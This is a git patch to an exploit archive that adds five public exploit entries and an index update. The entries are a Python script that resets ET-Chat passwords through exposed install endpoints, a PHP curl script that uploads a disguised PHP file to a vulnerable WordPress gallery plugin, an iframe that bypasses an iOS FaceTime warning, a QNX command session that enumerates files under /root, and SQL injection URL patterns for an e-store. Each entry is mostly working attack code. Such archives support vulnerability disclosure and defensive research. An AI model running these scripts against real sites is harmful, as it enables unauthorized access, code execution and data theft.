From 73b5663d00d601cceabb0e3ab8c4143fba69501a Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Tue, 29 Dec 2015 05:02:26 +0000
Subject: [PATCH] DB: 2015-12-29

5 new exploits
---
 files.csv                          |  5 +++++
 platforms/ios/remote/39114.txt     |  9 +++++++++
 platforms/linux/local/39112.txt    | 24 ++++++++++++++++++++++++
 platforms/multiple/remote/39115.py | 26 ++++++++++++++++++++++++++
 platforms/php/webapps/39111.php    | 19 +++++++++++++++++++
 platforms/php/webapps/39113.txt    | 11 +++++++++++
 6 files changed, 94 insertions(+)
 create mode 100755 platforms/ios/remote/39114.txt
 create mode 100755 platforms/linux/local/39112.txt
 create mode 100755 platforms/multiple/remote/39115.py
 create mode 100755 platforms/php/webapps/39111.php
 create mode 100755 platforms/php/webapps/39113.txt

diff --git a/files.csv b/files.csv
index 844cd3de2..b9ee1da13 100755
--- a/files.csv
+++ b/files.csv
@@ -35363,3 +35363,8 @@ id,file,description,date,author,platform,type,port
 39108,platforms/php/webapps/39108.txt,"POSH 3.1.x 'addtoapplication.php' SQL Injection Vulnerability",2014-02-26,"Anthony BAUBE",php,webapps,0
 39109,platforms/php/webapps/39109.txt,"WordPress Relevanssi Plugin 'category_name' Parameter SQL Injection Vulnerability",2014-03-04,anonymous,php,webapps,0
 39110,platforms/php/webapps/39110.txt,"Cory Jobs Search 'cid' Parameter SQL Injection Vulnerability",2014-03-05,Slotleet,php,webapps,0
+39111,platforms/php/webapps/39111.php,"WordPress Premium Gallery Manager Plugin Arbitrary File Upload Vulnerability",2014-03-06,eX-Sh1Ne,php,webapps,0
+39112,platforms/linux/local/39112.txt,"QNX Phgrafx File Enumeration Weakness",2014-03-10,cenobyte,linux,local,0
+39113,platforms/php/webapps/39113.txt,"Professional Designer E-Store 'id' Parameter Multiple SQL Injection Vulnerabilities",2014-03-08,"Nawaf Alkeraithe",php,webapps,0
+39114,platforms/ios/remote/39114.txt,"Apple iOS <= 4.2.1 'facetime-audio://' Security Bypass Vulnerability",2014-03-10,"Guillaume Ross",ios,remote,0
+39115,platforms/multiple/remote/39115.py,"ET - Chat Password Reset Security Bypass Vulnerability",2014-03-09,IRH,multiple,remote,0
diff --git a/platforms/ios/remote/39114.txt b/platforms/ios/remote/39114.txt
new file mode 100755
index 000000000..7094be2d1
--- /dev/null
+++ b/platforms/ios/remote/39114.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/66108/info
+
+Apple iOS is affected by a security-bypass vulnerability.
+
+Successfully exploiting this issue may allow an attacker to bypass certain security warnings. This may aid in further attacks.
+
+These issues affect Apple iOS versions prior to 7.1.
+
+<iframe src="facetime-audio://user () host com"></iframe> 
\ No newline at end of file
diff --git a/platforms/linux/local/39112.txt b/platforms/linux/local/39112.txt
new file mode 100755
index 000000000..8d8f4f639
--- /dev/null
+++ b/platforms/linux/local/39112.txt
@@ -0,0 +1,24 @@
+source: www.securityfocus.com/bid/66098/info
+
+QNX Phgrafx is prone to a file-enumeration weakness.
+
+An attacker can exploit this issue to enumerate the files present in the system's root directory; this may aid in further attacks.
+
+QNX 6.5.0 SP1, 6.5.0, 6.4.1, 6.3.0, and 6.2.0 are vulnerable; other versions may also be affected. 
+
+$ id
+uid=100(user) gid=100
+
+# directory /root/.ph exists:
+$ /usr/photon/bin/phgrafx -d /root/.ph
+load_display_conf(): No such file or directory
+
+# file /root/.profile exsts:
+$ /usr/photon/bin/phgrafx -d /root/.profile
+/root/.profile: opendir(): Not a directory
+load_display_conf(): Not a directory
+
+# /root/doesnotexist does not exist:
+$ /usr/photon/bin/phgrafx -d /root/doesnotexist
+/root/doesnotexist: opendir(): No such file or directory
+load_display_conf(): No such file or directory
\ No newline at end of file
diff --git a/platforms/multiple/remote/39115.py b/platforms/multiple/remote/39115.py
new file mode 100755
index 000000000..5fc838709
--- /dev/null
+++ b/platforms/multiple/remote/39115.py
@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/66149/info
+
+ET - Chat is prone to a security bypass vulnerability.
+
+An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks.
+
+ET - Chat 3.0.7 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/env python
+__author__ = 'IRH'
+print "Example: et-chat.py http://et-chat.com/chat"
+
+import urllib
+import sys
+
+url = sys.argv[1]
+url1 = url+"/?InstallIndex"
+url2 = url+"/?InstallMake"
+
+checkurl = urllib.urlopen(url1)
+
+if checkurl.code == 200 :
+    urllib.urlopen(url2)
+    print "Password Was Reseted!! Enjoy ;)"
+else:
+    print "Site is not Vulnerability"
diff --git a/platforms/php/webapps/39111.php b/platforms/php/webapps/39111.php
new file mode 100755
index 000000000..9d95bd55b
--- /dev/null
+++ b/platforms/php/webapps/39111.php
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/66044/info
+
+Premium Gallery Manager plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.
+
+An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks may also possible. 
+
+<?php
+$uploadfile="Sh1Ne.php.jpg";
+$ch =
+curl_init("http://www.example.com/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS,
+         array('Filedata'=>"@$uploadfile", 
+'folder'=>'/wp-content/plugins/Premium_Gallery_Manager/uploadify/'));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult"; 
+?>
diff --git a/platforms/php/webapps/39113.txt b/platforms/php/webapps/39113.txt
new file mode 100755
index 000000000..dfa295ee9
--- /dev/null
+++ b/platforms/php/webapps/39113.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/66100/info
+
+E-Store is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+E-Store 1.0 and 2.0 are vulnerable; other versions may also be affected. 
+
+http://www.example.com/page.php?id=[SQL Injection]
+
+http://www.example.com/news.php?id=[SQL Injection] 
\ No newline at end of file